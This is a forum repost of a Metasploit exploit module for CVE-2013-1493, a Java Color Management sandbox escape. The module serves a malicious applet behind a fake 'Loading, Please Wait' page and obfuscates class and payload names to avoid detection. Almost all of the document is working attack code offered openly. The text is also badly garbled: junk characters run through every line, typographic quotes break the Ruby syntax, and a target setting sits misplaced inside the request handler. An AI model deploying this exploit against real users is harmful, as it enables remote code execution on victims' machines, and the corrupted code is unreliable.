##
5 s; k/ T; k+ F. j% _" q# B& `" U' z
: }& |0 U" S5 D+ t# j- \5 t# This file is part of the Metasploit Framework and may be subject to9 G5 X6 J6 F! [ E& y" \
# redistribution and commercial restrictions. Please see the Metasploit$ g3 r- Y3 p& _6 J
# web site for more information on licensing and terms of use.
' r9 i7 w" D9 x" E" p U# http://metasploit.com/" v6 f( ` G# N" a
##
3 B) r5 @$ f+ r$ |require ‘msf/core’
9 M! H9 Y9 b$ t+ Srequire ‘rex’
* ~* p& m; l7 v+ n; rclass Metasploit3 < Msf::Exploit::Remote
, C" |" w/ {3 H& vRank = NormalRanking3 K2 B" t- U) o/ R* c: t
include Msf::Exploit::Remote::HttpServer::HTML1 e. c ]" ]; _( V7 n! r
include Msf::Exploit::EXE
. K+ j5 F7 F; E, minclude Msf::Exploit::Remote::BrowserAutopwn Q9 Y+ p h$ M+ P8 j- V5 s- s
autopwn_info({ :javascript => false })
. g8 v: x$ y' gdef initialize( info = {} )
6 W# Q0 }9 B' ~" [; ssuper( update_info( info,
5 F* ^6 d8 ~+ A2 p& d‘Name’ => ‘Java CMM Remote Code Execution’,
7 u; F# h+ T+ ]( n" A& { ~4 {% e‘Description’ => %q{/ e/ F3 C/ `! N2 v+ i
This module abuses the Color Management classes from a Java Applet to run' p9 C% c( Z/ q
arbitrary Java code outside of the sandbox as exploited in the wild in February5 U( ~2 Y! G! m2 i, B
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
# n2 \3 Z: U4 k8 F. b1 X$ aand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
3 v+ x$ V$ x4 n( \/ [* c0 x5 Y7 Qsystems. This exploit doesn’t bypass click-to-play, so the user must accept the java; _" a( @' F- z# b# x/ ~- E
warning in order to run the malicious applet.2 X" g4 @* P7 F0 p2 k
},. ^' E X# X N% q" H, k5 V. n
‘License’ => MSF_LICENSE,
" ?4 o# n6 z& d4 W7 U! p, j" B‘Author’ =>5 o+ n; d+ g, r, d4 b6 z
'Unknown', # Vulnerability discovery and Exploit- h$ z Y% `! A5 h+ A l* ^
'juan vazquez' # Metasploit module (just ported the published exploit)% w; }9 B( g9 O) n! f" h# [2 i0 g
],
0 y" d4 \% H2 ~6 I& q‘References’ =>$ L) J. n |5 r2 V% J1 R) m
[$ _' M- R9 n/ L; m
[ 'CVE', '2013-1493' ],# Y" e' B* V8 J* d
[ 'OSVDB', '90737' ],
+ c! J6 A8 W. \/ d+ p[ 'BID', '58238' ],
5 |. N; v; c5 q[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
" r w$ b$ N* q[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
8 z7 {9 t$ C4 D' a2 M7 |[ 'URL', 'http://pastie.org/pastes/6581034' ]
) T+ B7 l) \$ n+ @5 n8 ~],6 v. T4 X! }( p% O( g9 s
‘Platform’ => [ 'win', 'java' ],
1 i: ^, W( z. C* Z1 U+ w‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
9 M; y. N3 ~1 X7 [7 ^ _, h‘Targets’ =>7 J7 B- x6 G$ U: H: K5 H5 `
[
9 \( r: i( D# p[ 'Generic (Java Payload)',! y& n& Q- \" S
{
6 `5 {% m. z o0 K& z'Platform' => 'java',
0 v- d' f7 r! {7 R9 N! B'Arch' => ARCH_JAVA4 `- \' W2 v. ^, g
}
2 {- }( t5 b* p; s& l8 x) m],) J# j; B: T- M) Y2 U% X5 H: y
[ 'Windows x86 (Native Payload)',
B/ \* ]# S) d* Z{
! [, L* G7 Q4 X* g6 Y'Platform' => 'win',, q" E( U+ i( v" A5 f0 L
'Arch' => ARCH_X86
7 Q" X c, w, i}" p$ y" f5 s" l4 K
]
5 i7 }; U" C0 K) S f- b],6 \" T0 y2 d5 Y# p( X% w
‘‘DisclosureDate’ => ‘Mar 01 2013′
2 T3 q7 t1 Z; b u+ r; ]% Y))
$ I* e0 r8 u( M2 Lend
4 z; M8 I. d" fdef setup0 n7 @2 Q* ]- Y: `6 w2 A# _! G
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)
. Z( Y/ B& Z g |/ X4 }@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
, a4 ~) {5 \; p, J V) D+ Tpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)% s8 H) I i) [5 @& p' y' s8 j
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
) ]4 L/ Q; l2 W5 a+ L2 cpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)
0 @% e! X2 \2 y4 D S* V@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }0 V- H9 v5 g/ \& B- q" [4 ^0 S5 b0 i
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”): r0 U* I4 I. U9 D4 ]( P, a
@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }' r# u& W# _; K5 g2 K% t k
@init_class_name = rand_text_alpha(“Init”.length)1 n& W* R* V7 P% K! v, |- _* s! z+ a
@init_class.gsub!(“Init”, @init_class_name)
$ Q1 b% \/ f6 \( N k& n) Tsuper
2 }! f9 T5 E- ^) A2 X1 N! l, ]end5 `" z5 v9 ~& D T
def on_request_uri(cli, request)( G1 D* @& P( _ w6 t1 r
print_status(“handling request for #{request.uri}”)' H8 z6 H# l+ h N
case request.uri/ u/ r& f1 S9 M( r5 b* W
when /\.jar$/i
5 S# a/ N4 B* `. N0 p/ _7 pjar = payload.encoded_jar
9 l+ h* w; p& e; H2 r% N( x# ejar.add_file(“#{@init_class_name}.class”, @init_class)
4 E& z! z4 J7 c1 b" }" B0 ^; q; Kjar.add_file(“Leak.class”, @leak_class)4 O7 I1 ~! c9 T5 P8 X& I0 o. b
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
2 V! A. x, h4 ~- N/ bjar.add_file(“MyColorSpace.class”, @color_space_class)
: G J1 y# c0 T5 ]DefaultTarget’ => 1,
% ]. ~. Y8 ?5 C" Kmetasploit_str = rand_text_alpha(“metasploit”.length)
( T' B% Y/ K, n4 P% A$ upayload_str = rand_text_alpha(“payload”.length): U* X* l7 h/ w2 ~3 _' J- y. d |
jar.entries.each { |entry|
) Q* k$ `* Q# s" G( F1 D$ ~" aentry.name.gsub!(“metasploit”, metasploit_str)
, q: b9 R X# t* ]5 D$ Sentry.name.gsub!(“Payload”, payload_str)
7 }8 y+ A5 c9 W' s( Kentry.data = entry.data.gsub(“metasploit”, metasploit_str)! P ^4 A7 u" \9 D$ o" a
entry.data = entry.data.gsub(“Payload”, payload_str)
) x2 c5 [) r+ E* d" D}/ Z* D% J, \+ G" r' R
jar.build_manifest: d+ p, }. Q/ o5 P5 G1 l Z& R
send_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })# S3 f" f1 W4 x+ r9 M& [) ~4 C
when /\/$/+ \* j" q# o( {: j6 ^. n5 x) N
payload = regenerate_payload(cli)
4 c9 W" r( |$ [. Q7 gif not payload9 q1 J$ p/ [: \6 d( x
print_error(“Failed to generate the payload.”)
. u, \% U4 C5 [% q# bsend_not_found(cli)3 \- W7 I4 i }' Z4 x. R e" y
return
( c$ z |9 G9 v8 G# k" Cend
" t. |7 {1 V! m! l9 Hsend_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ })9 W8 t! C0 e a2 U; K U8 F$ [2 R
else
1 I7 `/ @+ f. V/ E; D6 g( N2 f% I. Qsend_redirect(cli, get_resource() + ‘/’, ”)/ P( |1 o" u) g" V, `9 k" S- r, V
end& N0 b5 @8 r/ \. ~) T* L3 f4 x
end9 t, S, H: \+ l# i
def generate_html
$ E2 J# F5 j- m9 l, M& shtml = %Q|<html><head><title>Loading, Please Wait…</title></head>|- Z& C( G. o1 q/ q; X
html += %Q|<body><center><p>Loading, Please Wait…</p></center>|% w, D N9 p: Q; ?/ a8 \" ^
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
. i) @: G, ^, b% c$ Ghtml += %Q|</applet></body></html>|1 o, r4 o2 R* N- |* y+ }% ] I
return html4 M! |" ?/ ^- Y" w; |9 v u
end4 O) d9 n) T1 f+ S* r0 j
end/ Q/ g/ b0 a) C: f6 I- M5 F2 m
end0 O; F8 {( t. U4 {; z: r+ A' I. c6 d$ U! a6 Q
|
发表于 2013-4-4 17:31:17
收藏
支持
反对